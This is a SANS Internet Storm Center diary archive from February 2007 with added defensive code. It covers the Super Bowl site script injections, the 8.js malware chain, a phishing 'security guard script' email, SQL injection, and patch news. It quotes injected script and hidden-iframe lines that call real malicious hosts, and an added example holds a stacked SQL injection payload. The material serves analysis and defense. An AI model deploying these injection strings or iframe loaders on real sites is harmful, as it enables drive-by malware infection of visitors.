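The same high-bit stripping in Python, as an added example (not code from the diary or from DanielW): it undoes the encoding, flags a page that is mostly high-bit bytes, and pulls the script references out of the decoded result. The sample page and the placeholder URL are constructed; they are not the exploit site from the report.

```python
# Added example, not code from the diary: undo the "cooldiyer" high-bit
# encoding and pull the script/iframe references out of the decoded page.
# Clearing bit 7 of every byte is what the Perl one-liner
# s/(.)/chr(ord($1)&127)/ge does; a filter that pattern-matches the raw
# bytes never sees "<script", the browser treats the declared US-ASCII
# page as 7-bit and runs it anyway.
import re

SRC_RE = re.compile(rb'<(?:script|iframe)\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)


def decode_highbit(data: bytes) -> bytes:
    """Clear the high bit of every byte (a no-op on plain 7-bit ASCII)."""
    return bytes(b & 0x7F for b in data)


def encode_highbit(text: bytes) -> bytes:
    """Inverse of decode_highbit for 7-bit input; used only to build the sample."""
    return bytes(b | 0x80 for b in text)


def looks_encoded(data: bytes, threshold: float = 0.5) -> bool:
    """Heuristic: a 'text/html' body where most bytes have the high bit set is
    not UTF-8 text; it is probably this trick (or a binary served as HTML)."""
    if not data:
        return False
    high = sum(1 for b in data if b & 0x80)
    return high / len(data) >= threshold


def extract_sources(page: bytes) -> list:
    """script/iframe src URLs found in a (decoded) page, as str."""
    return [m.decode("ascii", "replace") for m in SRC_RE.findall(page)]


# Constructed sample: the clear-text page, then the encoded form a filter sees.
CLEAR_HTML = (b'<html><head><meta http-equiv="Content-Type" '
              b'content="text/html; charset=US-ASCII"></head>\n<body>'
              b'<script src="http://example.invalid/exploit.htm"></script>'
              b'</body></html>')
ENCODED_HTML = encode_highbit(CLEAR_HTML)

if __name__ == "__main__":
    print(b"<script" in ENCODED_HTML)                    # False: raw matching fails
    print(looks_encoded(ENCODED_HTML))                   # True
    print(extract_sources(decode_highbit(ENCODED_HTML)))  # the hidden reference
```

Run it on a saved page with `decode_highbit(open("gamefile.htm", "rb").read())`; the heuristic in `looks_encoded` is what you would wire into a proxy or IDS to catch the encoded form, since the byte pattern is the same whatever the payload.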


Published: 2007-02-10

SIP Packets Reload IOS Devices with support for SIP

Cisco has updated its security advisory on the recent issue where some affected versions of Cisco IOS can be crashed by certain crafted SIP packets sent to port 5060. The issue is compounded by a related bug that allows traffic to TCP port 5060 and UDP port 5060 on devices that are not configured for SIP.

Cisco reported that there are data streams that could appear to trigger the vulnerability unintentionally as well.



Published: 2007-02-09

Security Guard Script e-mail scam

There is a spam making the rounds that is targeting customers of ISPs. The template of the e-mail is attached below; the attackers are using some method to specifically mention the proper ISP name used by the victim. In short, it's trying to get you to upload scripts to your web server and run them. So far, the reverse engineering is ongoing, but it is obfuscated PHP or ASP code that will run once you go to that page.

So far, I've seen that it sends an email to firstbts@gmail.com and tries to get a 0-byte file from  I'm creating a VMware image to continue to reverse engineer it, but these e-mails are scams of the typical social engineering variety. It seems most anti-virus products pick this up already.


Dear <<insert ISP name here>> valued members

Regarding our new security regulations, as a part of our yearly maintenance we have provided a security guard script in the attachment.

So, to secure your websites, please use the attached file and (for UNIX/Linux Based servers) upload the file "guard.php" in: "./public_html" or (for Windows Based servers which use ASP) upload the file "guard.asp" in: "./wwwroot" in your site.

If you do not know how to use it, you can use the following instruction:

For Unix/Linux based websites that use PHP/CGI/PERL:
1) Download the attachment named "guard.zip"
2) Extract file "guard.php"
3) Login to your site Control panel.
4) Open "File Manager" window.
5) Go through "Public_html" or "htdocs"
6) Choose "Upload Files"
7) Upload the file "guard.php"
8) Check its URL too "http://www.yoursite.com/guard.php", if it is ok

For Windows based websites that use ASP:
1) Download the attachment named "guard.zip"
2) Extract file "guard.asp"
3) Login to your site Control panel.
4) Open "File Manager" window.
5) Go through "wwwroot" directory
6) Choose "Upload Files"
7) Upload the file "guard.asp"
8) Check its URL too "http://www.yoursite.com/guard.asp", if it is ok

Thank you for using our services and products. We look forward to providing you with a unique and high quality service.

Best Regards
<<insert ISP name here>>


John Bambenek, bambenek/at/gmail/dot/com
University of Illinois


Published: 2007-02-09

A Case of Identity Theft

ISC reader Aaron sent along a story in the News Tribune in Tacoma, WA. In short, it's the case of a serial identity thief who never got arrested but stole money from someone who is friends with a reporter. (Don't mess with journalists or their friends, oops. :) It's a pretty good read and a decent case study on ID theft and on the limitations in actually bringing these people to justice.

In this case, the identity theft took place because the individual involved had physical access to the victim's mail (it was a roommate). Right now, most identity theft takes place using non-technological means (e.g., dumpster diving). However, I still posit that electronic ID theft is not only dangerous, it is more dangerous. It takes time and effort to steal someone's identity in person. Online, with the right piece of malware and a good infection vector, you can steal thousands of identities in seconds. The only protection that is provided to consumers (at least in the United States) that I have been able to discern is that the existing fraud models limit the amount of money stolen by a particular attacker. Of course, risk management models allow companies to predict the amount of loss due to ID theft and pass it back down to the consumer in the form of increased prices. One day, someone will be smart enough to figure out how to bypass the fraud models.

It doesn't help that in the United States we have a weak national ID that is easy to steal (we call it a Social Security Number). Getting that number makes everything else easy. It certainly doesn't help that organizations like the US Department of Education use SSNs for authentication, making it easy for keyloggers to steal them. SSNs as authentication are stupid... once you know the 9-digit number the game is over. Keyloggers and other malware have successfully compromised (this is different from actually stealing all the money) about $55 billion in US assets alone (an increase from my earlier estimate).

In short, protect your identity as best you can, from both physical and electronic theft.

John Bambenek, bambenek/at/gmail/dot/com
University of Illinois


Published: 2007-02-09

PHP 5.2.1 released

PHP.net released version 5.2.1, which contains a number of security fixes.
"The majority of the security vulnerabilities discovered and resolved can in most cases be only abused by local users and cannot be triggered remotely. However, some of the above issues can be triggered remotely in certain situations, or exploited by malicious local users on shared hosting setups utilizing PHP as an Apache module. Therefore, we strongly advise all users of PHP, regardless of the version to upgrade to 5.2.1 release as soon as possible. PHP 4.4.5 with equivalent security corrections will be available shortly."

(BTW: since you will have to recompile/test PHP anyway, take a look at the security extensions from the Hardened-PHP project at www.hardened-php.net/; in particular 'Suhosin' is nice and not too hard to install and configure.)

Swa Frantzen -- net2s.com


Published: 2007-02-08

Where is Cameroon ?

Where is Cameroon?  Well, only a small typo away!  A reader today alerted us to the fact that "google.cm" is not your trusty search engine, but rather ... something else. Currently, the link leads to kind of a mock-up of a search tool named "Agoga" that appears to make money from displaying paid-for ad content. On first sight, we didn't find anything malicious lurking on the Agoga pages, but this could well change anytime (meaning: go there at your own risk).  In fact, and surprisingly enough, everything dot-cm ends up on that selfsame site. Yes, the Cameroon registry is running a DNS wildcard right at the top level domain. Think phisher's paradise -- onlinebank.cm, myspace.cm, paypal.cm, anyone?   If you haven't got legitimate business with firms in Cameroon, you might want to consider making your internal DNS server authoritative for .cm and return until the Cameroon registry deigns to rectify this sorry state of affairs.  Agoga.com seems to be owned by a company "Netview Inc" in Vancouver, BC.
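One way to do what the paragraph suggests on a BIND resolver, as an added example that is not from the diary: load an empty zone for the whole TLD so every .cm name gets NXDOMAIN from your own server instead of the wildcard answer. The file path and the SOA contact are assumptions.

```conf
// Added example, not from the diary: named.conf fragment for the internal
// resolver.  Because this server is now authoritative for "cm", no .cm query
// is ever forwarded to the registry's wildcard.  Note that this also blocks
// legitimate .cm sites, so remove it once the registry fixes the wildcard.
zone "cm" {
    type master;
    file "/etc/bind/db.empty-cm";
};

; /etc/bind/db.empty-cm: only the mandatory SOA and NS records, nothing below
; them, so any name under .cm resolves to NXDOMAIN.
$TTL 3600
@   IN  SOA localhost. hostmaster.localhost. (
            2007020801  ; serial
            3600        ; refresh
            900         ; retry
            604800      ; expire
            3600 )      ; negative-cache TTL
@   IN  NS  localhost.
```

Validate with `named-checkconf` and `named-checkzone cm /etc/bind/db.empty-cm` before reloading; afterwards `dig google.cm @your-resolver` should return status NXDOMAIN with the local SOA in the AUTHORITY section rather than the Agoga address.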


Published: 2007-02-08

Happy Patch Tuesday ahead

Microsoft Patch Tuesday is coming up, and we'll get a bounty again this time. Twelve patches in total, most of them rated at a lofty "critical", as usual. Yum.


Published: 2007-02-08

New MSN worm in Asia

Thomas writes in to report a new worm making the rounds over MSN in Asia.  The message content is something like "Heeey! I found a picture of you online, take a look".  Sites implicated so far (where the binary comes from) are viotagallery-dot-com and modelosunica-dot-com.  AV coverage is still leaky.


Published: 2007-02-08

TrendMicro Anti-Virus vulnerability

A buffer overflow vulnerability in the UPX parser of TrendMicro Antivirus seems to affect the product in pretty much all its incarnations. See esupport.trendmicro.com/support/viewxml.do   According to this, applying the latest pattern is sufficient to plug the problem until a new version of the engine (8.5) gets released.  Chances are, though, that the trend (no pun intended) will continue: AV products themselves contain the same type of vulnerabilities they claim to shield other software against. Quis custodiet ipsos custodes?


Published: 2007-02-07

Found: Possible Vector for Superbowl Websites Malicious JavaScript Insertion

We've received information that the likely common vector for how the web sites were compromised appears to be the use of Dreamweaver.

There was not a flaw in Dreamweaver that was exploited.  It was a case of lazy programming on the part of site developers who did not do a good job of "input validation", so attackers were able to perform "SQL injection" attacks.
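What that lazy programming looks like, as an added example that is not code from the diary or from any of the affected sites: the stacked-query pattern seen in the attack string (a numeric ID followed by `;update main set postitle='<script ...>';--`), reproduced against an in-memory SQLite table, next to the parameterised lookup and the input check that stop it. The table and column names follow the attack string; the job row, the `expired` column and the script URL are constructed.

```python
# Added example, not code from the diary or the affected sites: the stacked
# query behind the "postitle" defacement against an in-memory SQLite table,
# beside the parameterised query that defeats it.
import sqlite3

PAYLOAD = ("1343;update main set postitle="
           "'<script src=\"http://example.invalid/1.js\"></script>';--")


def setup() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("create table main (id integer primary key, "
                "postitle text, expired integer)")
    con.execute("insert into main values (1343, 'Ticket Office Clerk', 0)")
    con.commit()
    return con


def lookup_vulnerable(con: sqlite3.Connection, job_id: str) -> None:
    """Classic-ASP style: the query string value is glued into the SQL text and
    the whole batch goes to the server.  executescript() runs every statement
    in the string, as SQL Server does with a ';'-separated batch, so the
    attacker's UPDATE executes and the trailing '--' comments out the rest of
    our WHERE clause."""
    con.executescript("select postitle from main where id=" + job_id
                      + " and expired=0")


def lookup_safe(con: sqlite3.Connection, job_id: str):
    """Parameterised query: the value travels separately from the SQL text, so
    the payload is just a string that matches no id and changes nothing."""
    return con.execute("select postitle from main where id=? and expired=0",
                       (job_id,)).fetchone()


def validate_id(job_id: str) -> int:
    """Input validation the sites lacked: an ID is digits only, nothing else."""
    if not job_id.isdigit():
        raise ValueError("job ID must be numeric: %r" % job_id)
    return int(job_id)


def stored_title(con: sqlite3.Connection) -> str:
    """What the page would render for job 1343 on the next visit."""
    return con.execute("select postitle from main where id=1343").fetchone()[0]


if __name__ == "__main__":
    con = setup()
    lookup_vulnerable(con, PAYLOAD)
    print(stored_title(con))          # now carries the injected <script> tag
    con = setup()
    print(lookup_safe(con, PAYLOAD))  # None, and the row is untouched
```

The point to check in your own code is the second function: the fix is not escaping quotes in the ID (the payload above contains none before the stacked statement) but binding the value as a parameter, plus rejecting anything that is not a plain integer before it reaches the database at all.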


Published: 2007-02-06

Attack on DNS root servers

The various wire services and various astute ISC readers have pointed out the news of the attacks against the DNS root servers.  We are aware of the attacks, and have been waiting to wade through the FUD before publishing anything more concrete.  I am posting this now just to let our readers know that we are aware of the story and that we are trying to get more information about it.  If you have any more information (logs, packets, or if you actually run one of the tld roots) please drop us a line.

The main story is featured here:


There are some graphs showing the traffic rates to the root servers here:


Mike Poor


Published: 2007-02-06

Internet Explorer msxml3 concurrency problems: update

The CVE-2007-0099 vulnerability has potential for remote code execution, which could make it much more critical than the plain DoS demonstrated by the publicly known exploit.

In our interactions we have been led to believe that the remote code execution vector is too hard to control to be of any practical use to attackers. Therefore we updated our overview table to reflect a Less Urgent need to act on it.

Swa Frantzen -- net2s.com


Published: 2007-02-06

more code injection sites 8.js

We have discovered more defacements / code injections similar to the Super Bowl site defacement.
If you google for "script 8.js" you will find that 1.js and 3.js were not the only JavaScript files used in this fashion. This version appears to have been targeted a bit at gaming sites, although there are a few medical sites, including an "anonymous expert HIV/AIDS counseling" site, with this defacement.

Why am I calling this a defacement?
Because that is what we called it in the past when a bad guy gained access to portions of a website and replaced or added their own content. The concept of a website having additional content or having portions of its content replaced was usually looked at as embarrassing but not a major threat. In my opinion, with the recent trend to perform "silent defacements" with malicious code injection, world-writable content areas should be treated as a threat.

The only malicious version of 8.js I have seen so far is hosted on www.001yl.com

<skript scr=hxxp://www.001yl.c0m/8.js></skript>

The stuff I pulled from www.001yl.com is very similar to the 3.js defacement we discussed in the Dolphin Stadium site write-ups.

8.js uses a hidden iframe to hide its reference to qq.htm
document.write('<iframe src="hxxp://www.zj5173.com/qq.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>');

qq.htm uses several hidden iframes to call happy1.htm, happy2.htm and happy3.htm from www.001yl.com, h.js from www.zj5173.com and a counter at s102.cnzz.com.

Each of happy1.htm (and 2 and 3) had pointers to http://www.zj5173.com/2.exe

h.js injects http://www.zj5173.com/3.js into a cookie.
3.js uses another hidden iframe to call hxxp://www.zj5173.com/1.htm
1.htm uses a VML overflow from www.hackwm.com to run some shellcode.

2.exe is not currently well detected by the virus scanning engines at VirusTotal:

Antivirus Version Update Result
AntiVir 02.06.2007 TR/PSW.16132
Authentium 4.93.8 02.06.2007 W32/Downloader.gen10
Avast 4.7.936.0 02.05.2007 no virus found
AVG 386 02.05.2007 no virus found
BitDefender 7.2 02.05.2007 DeepScan:Generic.PWS.WoW.911CB0F4
CAT-QuickHeal 9.00 02.05.2007 (Suspicious) - DNAScan
ClamAV devel-20060426 02.05.2007 no virus found
DrWeb 4.33 02.05.2007 no virus found
eSafe 02.05.2007 suspicious Trojan/Worm
eTrust-InoculateIT 30.4.3371 02.05.2007 no virus found
eTrust-Vet 30.4.3371 02.05.2007 Win32/Gumbsumb!generic
Ewido 4.0 02.05.2007 no virus found
Fortinet 02.06.2007 no virus found
F-Prot 02.05.2007 W32/Downloader.gen10
Ikarus T3.1.0.31 02.06.2007 Generic.PWS.WoW
Kaspersky 02.06.2007 no virus found
McAfee 4956 02.05.2007 no virus found
Microsoft 1.2101 02.06.2007 no virus found
NOD32v2 2039 02.06.2007 no virus found
Norman 5.80.02 02.05.2007 no virus found
Panda 02.06.2007 no virus found
Prevx1 V2 02.06.2007 no virus found
Sophos 4.13.0 02.05.2007 no virus found
Sunbelt 2.2.907.0 02.02.2007 VIPRE.Suspicious
Symantec 10 02.06.2007 no virus found
TheHacker 02.05.2007 no virus found
UNA 1.83 02.05.2007 no virus found
VBA32 3.11.2 02.05.2007 suspected of Malware.Agent.36 (paranoid heuristics)
VirusBuster 4.3.19:9 02.05.2007 no virus found

Additional Information
File size: 16132 bytes
MD5: ab2528881a3107463e13322fa31ecc4c
SHA1: 0fa0b4469f7765112e167f07a61954aeec7b1373
packers: UPX
packers: UPX, embedded
Sunbelt info: VIPRE.Suspicious is a generic detection

A Norman sandbox run shows this binary does some very suspicious stuff to a system.

2.exe : Not detected by Sandbox (Signature: NO_VIRUS)

[ General information ]
* Decompressing UPX.
* Accesses executable file from resource section.
* Creating several executable files on hard-drive.
* File length: 16132 bytes.
* MD5 hash: ab2528881a3107463e13322fa31ecc4c.

[ Changes to filesystem ]
* Deletes file C:\WINDOWS\system32\bdscheca001.dll.
* Creates file C:\WINDOWS\system32\bdscheca001.dll.
* Deletes file C:\WINDOWS\system32\drivers\etc\Hosts.

[ Changes to system settings ]
* Creates WindowsHook monitoring messages activity.

[ Signature Scanning ]
* C:\WINDOWS\system32\bdscheca001.dll (11524 bytes) : no signature detection.

(C) 2004-2006 Norman ASA. All Rights Reserved.

1.htm appears to be a fairly well recognized iframe exploit.
From VirusTotal:

Antivirus Version Update Result
AntiVir 02.06.2007 JS/Dldr.Small.CR.2
Authentium 4.93.8 02.06.2007 HTML/IFrameBoF@expl
Avast 4.7.936.0 02.06.2007 no virus found
AVG 386 02.06.2007 no virus found
BitDefender 7.2 02.05.2007 Trojan.Downloader.JS.SetSlice.B
CAT-QuickHeal 9.00 02.06.2007 no virus found
ClamAV devel-20060426 02.06.2007 Exploit.HTML.IFrameBOF-4
DrWeb 4.33 02.06.2007 Trojan.DownLoader.18179
eSafe 02.06.2007 no virus found
eTrust-InoculateIT 30.4.3372 02.06.2007 no virus found
eTrust-Vet 30.4.3372 02.06.2007 JS/Veemyfull!exploit
Ewido 4.0 02.06.2007 Not-A-Virus.Exploit.HTML.IframeBof
Fortinet 02.06.2007 no virus found
F-Prot 02.06.2007 HTML/IFrameBoF@e
Ikarus T3.1.0.31 02.06.2007 Exploit.HTML.IframeBof
Kaspersky 02.06.2007 Exploit.HTML.IframeBof
McAfee 4957 02.06.2007 JS/Exploit-BO.gen
Microsoft 1.2101 02.06.2007 TrojanDownloader:JS/SetSlice
NOD32v2 2041 02.06.2007 no virus found
Norman 5.80.02 02.06.2007 no virus found
Panda 02.06.2007 no virus found

File size: 10776 bytes
MD5: a7219fc65ea45252850e483a109cf0b3
SHA1: 261bac500ceedbd360768a193daf55b6b199de04


Published: 2007-02-06

New Samba release fixes security issues

Samba-3.0.24 was released yesterday to fix 3 security vulnerabilities.  Anyone running an older version should take a look at the release notes and seriously consider upgrading (there are also patches against 3.0.23d available on the Samba site).



Published: 2007-02-05

More on dealing with image spam

During my last shift on 15 Jan, I did a story on dealing with the image spam that I was getting on the little mail server I run at home.  I got quite a few excellent responses to that story, so I wanted to summarize those and share them with our readers.  My thanks to Steve, Dave, Tim, Alexander, Joanne, and John (I hope I didn't miss anyone).


Several people suggested looking at dspam.  Some people said they had given up on SpamAssassin and gone strictly with dspam.  I've added dspam to the mix, and mostly get pretty good results.  The biggest problem I'm seeing with dspam is that it is still not detecting some of the image spam that takes its text from legitimate sources on the internet.  FuzzyOCR and some of the blocklists seem to catch most of these, but even feeding all the false negatives back through dspam for training, some are still getting through.  Having said that, I like dspam and will definitely keep it in the mix.  I've had a suggestion (that I haven't tried yet) that I should run dspam outside of amavisd-new rather than from within it, which is how I am running it now.


Steve suggested I take a look at the ClamAV phish and scam rules from sanesecurity.com, which can be found here.  I haven't tried them out yet.  If you do, let me know what you think.


I didn't mention it, but I do, in fact, do greylisting using gld (readers also suggested postgrey and sqlgrey) in my postfix setup.  Unfortunately, because most of the addresses that receive mail on my server are forwarded from elsewhere, and those other sites have already accepted the e-mail, greylisting is only moderately useful in my personal situation, but I recommend trying it out.  I also should note that because I sometimes *want* to get spam and viruses at some of these e-mail addresses (including my isc.sans.org address), I turn off spam and virus filtering at these forwarding services.  If your job (or hobby) doesn't include playing with malware, leaving that filtering turned on might save you from some of the problems that I've been seeing.

DNS blocklists

Several folks suggested the blocklists such as the Spamhaus sbl+xbl list.  I actually have those configured in postfix and I have the DNSBL SpamAssassin rules (25_uribl.cf) enabled.  As with greylisting, the postfix use of the blocklists doesn't help if another MTA has already accepted the mail and is forwarding it to me, but the SpamAssassin usage then increases the score if it detects those source IPs in the Received: headers.

block dynamic IPs

This argument tends to take on the tone of a religious argument and I'm not going to rehash all that here.  Yes, I'm aware that most spambots seem to be infected home machines, and that if I rejected all mail from them and/or if ISPs blocked outbound e-mail from them, that would greatly reduce the problem.  It would also punish people like me who have a domain website and e-mail (very low volume) hosted on a home system connected to the internet via cable modem.  Having said that, some of the DNSBLs discussed above do, in fact, block e-mail from dynamic IP ranges.  Also, as noted above, that isn't quite as useful in my particular case as it might be because of the forwarding.

block all gif images

One suggestion was to block all gif images (either block e-mail containing them or strip them from the e-mail).  This is another suggestion I haven't tried and probably won't in the near future.  There can certainly be some backlash and/or collateral damage with this one, but since I'm reading my e-mail as plain text, I wouldn't really miss most of those images.  One reader suggested that there was some fallout because of the company logo gifs getting dropped, so this person adjusted the rules to block gifs over a certain size.  Of course, if you drop gifs, what about jpegs?  other image types?  mis-identified image types?

playing with SA scores for mailing lists

Finally, another reader commented that they were able to cut out some of the mailing list spam by some judicious playing with the scores assigned by SpamAssassin.  This amounts to giving mail to the mailing list an initial negative score (assume that most mail to the list is not spam) and then giving it an additional higher score if the Bayes tests show it is likely to be spam (e.g., add back another few points if it hits on BAYES_95 or BAYES_99, etc.).  As a result of discussions with this reader I joined the spamassassin-users list and have had to tweak some of my own scoring to deal with (half-)false positives on that list.  Imagine, a mailing list that deals with a tool for assassinating spam might actually include samples of spam.  Doh!
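The scoring trick just described, written out as a SpamAssassin local.cf fragment; this is an added example, not the reader's or the handler's actual rules, and the List-Id pattern is an assumption you would replace with the list you subscribe to.

```conf
# Added example, not from the diary: local.cf rules for one mailing list.
# The List-Id value is an assumption; substitute your own list's header.
header   LIST_SA_USERS         List-Id =~ /users\.spamassassin\.apache\.org/i
describe LIST_SA_USERS         Posted via the spamassassin-users mailing list
score    LIST_SA_USERS         -3.0

# Give the points back (and then some) when Bayes is confident anyway, so a
# spam sample quoted on the list still lands in the junk folder.
meta     LIST_SA_USERS_SPAMMY  (LIST_SA_USERS && (BAYES_95 || BAYES_99))
describe LIST_SA_USERS_SPAMMY  List mail that Bayes still rates as spam
score    LIST_SA_USERS_SPAMMY  4.0
```

Check the syntax with `spamassassin --lint`, then run a saved list message through `spamassassin -t < msg.eml` and confirm which of the two rules fire in the report; the net effect for a clean list post is -3.0, for a quoted spam sample +1.0 on top of whatever Bayes already scored.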

Jim Clausing, jclausing ++at++ isc dot sans dot org


Published: 2007-02-05

More VA data lost... Laptop encryption anyone?

A portable hard drive with the information of potentially 48,000 veterans is missing from a VA medical facility in Birmingham, Alabama.  In an interesting development, Rep. Spencer Bachus, R-Ala., said that over half of the information was not encrypted.  This implies that just under half was... I wonder what solution they are using.

The Bush administration gave agencies 45 days from June 23rd, 2006 to comply with two-factor authentication and drive encryption standards set forth by NIST and the NSA.

Official Whitehouse memo on hard drive encryption:

"1. Encrypt all data on mobile computers/devices which carry agency data unless the data
is determined to be non-sensitive, in writing, by your Deputy Secretary or an
individual he/she may designate in writing; "

The topic of laptop/hard drive encryption is a very hot one.  Almost all of my clients are asking for solutions and thoughts on the matter.  Some of them have rolled out Utimaco, with mostly positive results.  Others have gone with PGP Universal, choosing one solution for both disk and email encryption.

What are your organizations using?  Perhaps this will be a new poll.

Mike Poor
SANS Internet Storm Center Handler on Duty


Published: 2007-02-04

Super Bowl Infection - More Sites

[See the update below]

On Friday we reported that the Dolphin Stadium (home of the 2007 Super Bowl) web site was infected with a scripted pointer to malware that exploited two patchable Microsoft Windows vulnerabilities.  While doing research on that issue we uncovered many more sites that contain similar references.  Here is a list of some of the ones we found; many have already been cleaned up, but many have not.  System administrators might want to check their network flow logs for any traffic to these sites, and for any traffic to the five sites that hosted the hostile JavaScript.

It looks like the "1.js" intrusions happened around the first of January, while the "3.js" intrusions occurred near the end of January.  We cannot find any evidence of a "2.js" or "4.js" script.  In the references below, I changed the word "script" to "skript" in order to prevent any accidental misfires.

<skript src="http://w1c.cn/3.js"></skript>

<skript src="http://dv521.com/3.js"></skript>

<skript src="http://www.natmags.co.uk/3.js"></skript>

<skript src="http://bc0.cn/3.js"></skript>

<skript src="http://bc0.cn/1.js"></skript>

<skript src="http://137wg.com/1.js"></skript>

A common theme seems to be an attack on hospital or medical care sites, although that is not completely the case.  We checked to see if this was a mass attack on one service provider, but other than a lot of *.squizzle.com sites it does not appear to be that type of attack.

[UPDATE 5 Feb 07 1754Z]

A reader sent us this:

I think the 1.js problem goes back a bit further in time. I found these logs:

Fri Dec 1 10:08:44 2006: x.x.x.x -> 54995 -> 80 GET /1.js HTTP/1.0 (bc0.cn)
Wed Dec 6 11:42:05 2006: x.x.x.x -> 55089 -> 80 GET /1.js HTTP/1.0 (bc0.cn)
Mon Dec 11 14:17:04 2006: x.x.x.x -> 51732 -> 80 GET /1.js HTTP/1.0 (bc0.cn)
Thu Dec 21 12:17:55 2006: x.x.x.x -> 48628 -> 80 GET /1.js HTTP/1.0 (bc0.cn)

...which makes us curious as to when this incident started.  If you could check your logs and let us know about detections prior to December 1st, 2006, we would greatly appreciate it.  We'll post an update here later today or tonight.
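An added example that serves two passages on this page, the hidden-iframe chain walked through in the 8.js diary above and the flow-log check suggested in this one; it is not code from either diary. It extracts the `<script>`/`<iframe>` references planted in page or JavaScript content (de-fanged `hxxp` included), flags zero-size iframes, reduces the result to a host list, and runs that list over log lines in the format the reader quoted. The page fragments, the log lines and the client addresses are constructed; the hosts are the ones the diaries name.

```python
# Added example, not code from the diaries: extract injected script/iframe
# references, turn them into a host list, and hunt for fetches of those
# hosts in proxy log lines of the form quoted above.
import re
from urllib.parse import urlparse

TAG_RE = re.compile(r'<(script|iframe)\b[^>]*>', re.I)
SRC_RE = re.compile(r'\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
ZERO_RE = re.compile(r'\b(width|height)\s*=\s*["\']?0["\']?', re.I)
LOG_RE = re.compile(r'^(?P<ts>.+?): (?P<client>\S+) -> (?P<sport>\d+) -> (?P<dport>\d+) '
                    r'(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\S+ \((?P<host>[^)]+)\)$')


def refang(url: str) -> str:
    """Turn a de-fanged hxxp://... or [.] reference back into a parseable URL."""
    return re.sub(r'^hxxp', 'http', url, flags=re.I).replace('[.]', '.')


def norm_host(host: str) -> str:
    """Lower-case and drop a leading www. so both forms in logs compare equal."""
    host = host.lower().strip()
    return host[4:] if host.startswith('www.') else host


def extract_references(content: str) -> list:
    """(tag, url, hidden) for every <script>/<iframe> carrying a src attribute.
    Tags inside document.write('...') match as well, since the regex does not
    care what wraps the tag.  hidden is True when width and height are both 0,
    the zero-size iframe pattern used by qq.htm and 8.js."""
    refs = []
    for m in TAG_RE.finditer(content):
        tag = m.group(0)
        src = SRC_RE.search(tag)
        if not src:
            continue
        zero = {a.lower() for a in ZERO_RE.findall(tag)}
        refs.append((m.group(1).lower(), refang(src.group(1)),
                     {'width', 'height'} <= zero))
    return refs


def ioc_hosts(refs, injected_only: bool = True) -> set:
    """Hosts to hunt for.  With injected_only, keep <script> sources and hidden
    iframes and drop visible iframes (ad banners and the like)."""
    hosts = set()
    for tag, url, hidden in refs:
        if injected_only and tag == 'iframe' and not hidden:
            continue
        h = urlparse(url).hostname
        if h:
            hosts.add(norm_host(h))
    return hosts


def suspicious_fetches(log_lines, hosts) -> list:
    """(timestamp, client, host, path) for each log line whose destination host
    (with or without www.) is on the IOC list."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line.rstrip('\n'))
        if not m:
            continue          # not this log format: skip rather than guess
        host = norm_host(m.group('host'))
        if host in hosts:
            hits.append((m.group('ts'), m.group('client'), host, m.group('path')))
    return hits


# Constructed samples: an injected job page, the 8.js document.write line
# (de-fanged), and three log lines in the reader's format.
SAMPLE_PAGE = ('<html><body><h1>Jobs</h1>\n'
               '<script src="http://bc0.cn/1.js"></script>\n'
               '<iframe src="http://example.invalid/ad.htm" width="300" height="250"></iframe>\n'
               '</body></html>')
SAMPLE_8JS = '''document.write('<iframe src="hxxp://www.zj5173.com/qq.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>');'''
SAMPLE_LOG = [
    "Fri Dec 1 10:08:44 2006: 10.0.0.5 -> 54995 -> 80 GET /1.js HTTP/1.0 (bc0.cn)",
    "Fri Dec 1 10:09:02 2006: 10.0.0.5 -> 54996 -> 80 GET /index.html HTTP/1.1 (www.example.com)",
    "Tue Feb 6 09:11:30 2007: 10.0.0.9 -> 51732 -> 80 GET /qq.htm HTTP/1.1 (www.zj5173.com)",
]

if __name__ == "__main__":
    refs = extract_references(SAMPLE_PAGE) + extract_references(SAMPLE_8JS)
    iocs = ioc_hosts(refs)
    for hit in suspicious_fetches(SAMPLE_LOG, iocs):
        print(hit)
```

Feed `ioc_hosts` the references you have actually judged malicious rather than everything on the page: a site's own script tags and visible ad iframes are normal, the zero-size iframe and an external script you did not put there are not. The hits name the internal client and the time, which is what you need to decide whether the two MS06-014/MS07-004 patches were in place on that machine when it fetched the script.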

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-02-04

Securing Apache/PHP

Nathan wrote in earlier with attempts to exploit PHP file inclusion that his server had automatically thwarted. He's promoting the use of mod_security, mod_evasive, fail2ban and suhosin in a Apache/PHP environment.

Since knowledge and experience are a way to win against the bad guys, how about sharing your favorite setup for Apache/PHP security (basically a "LAMP" environment, although I'd rather not focus on the OS part in there) and we'll summarize on this page. Also let us know what you like about the components you use, why they are your favorites, etc.







Nathan used this tool to ban IP addresses producing repeated 404/501 error results.  He catches attempts to hack PHP-based forums this way, and was able to trace them back to owned servers conducting those attacks against him.



Swa Frantzen -- net2s.com


Published: 2007-02-03

Solution for: The Twelve Days of Christmas Packet Challenge

Once again, I want to thank everyone that participated.  I received a lot of requests for more packet challenges, which warms my heart :>)   This packet challenge was fun to create and the responses were awesome as well.  I'm working to put together a series of challenges.  I hope to have the first one posted in the very near future, so stay tuned!  For this packet challenge, you can find the packets here if you would like to give it a try and missed it over the holidays.  If so, stop reading now because I'm going to reveal the correct answer.  I would like to say congratulations to the following folks who submitted correct answers, and I hope I didn't miss anyone.  A job well done:

Michael Brown and Kenny Long (sent as a joint effort)
Brandon Greenwood
Nicholas Albright
J. Mike Rollins
Morgan Bailey
Andre M. DiMino

To solve the packet challenge, you needed to first decode the data contained in each packet.  The data was encoded using Base64.  There are lots of tools and scripts around that will encode/decode Base64 for you.  Once you got the data decoded, you had to decide the correct order the data from the packets should be arranged in to see what the handlers were giving you for Christmas.  The song it was based on was the 12 days of Christmas and the correct ordering of the packets could be accomplished by putting the Sequence Numbers in increasing order.  Here is the data decoded and in its correct order:

On the xxxx day of christmas the handlers gave to me a packet capture in its entirety
On the xxxx day of christmas the handlers gave to me xxxx C&Cs
On the xxxx day of christmas the handlers gave to me xxxx phat bots
On the xxxx day of christmas the handlers gave to me xxxx orange smurfs
On the xxxx day of christmas the handlers gave to me xxxx Token Rings
On the xxxx day of christmas the handlers gave to me xxxx sensors failing
